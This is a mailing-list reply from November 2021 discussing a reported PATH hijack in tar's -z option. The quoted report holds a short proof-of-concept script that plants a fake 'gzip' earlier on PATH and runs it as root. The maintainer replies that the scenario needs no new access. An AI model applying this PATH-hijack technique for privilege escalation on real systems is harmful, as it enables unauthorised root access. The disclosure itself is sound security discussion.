[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Path Hijack vulnerability
From: |
Michał Górny |
Subject: |
Re: Path Hijack vulnerability |
Date: |
Wed, 03 Nov 2021 18:43:48 +0100 |
User-agent: |
Evolution 3.42.0 |
On Wed, 2021-11-03 at 15:21 +0100, Gregorio Giacobbe wrote:
> Hi!
>
> As per subject, I discovered a Path Hijack vulnerabilty in the tar binary.
> When using the -z switch for gzip compression/decompression the binary calls
> “gzip” without absolute path, hence allowing the path Hijack.
> While this, in a normal scenario can be totally harmless, it can be used as a
> privileged escalation technique when the tar binary is called as root user.
>
> Following lines will provide a basic PoC:
> ----
> export PATH=$(pwd):$PATH
> echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip
> chmod +x gzip
> touch file.txt
> tar -zcf backup.tar.gz file.txt
> ls -la /tmp/tarred
> -rw-r--r-- 1 root root 0 Nov 3 14:05 /tmp/tarred
> ----
>
> I have not tested switches for other compression/decompression formats, so
> there is a chance that they can be used as well as gzip.
>
Do you realize that if you have sufficient access to inject "gzip", you
may inject "tar" as well, right?
--
Best regards,
Michał Górny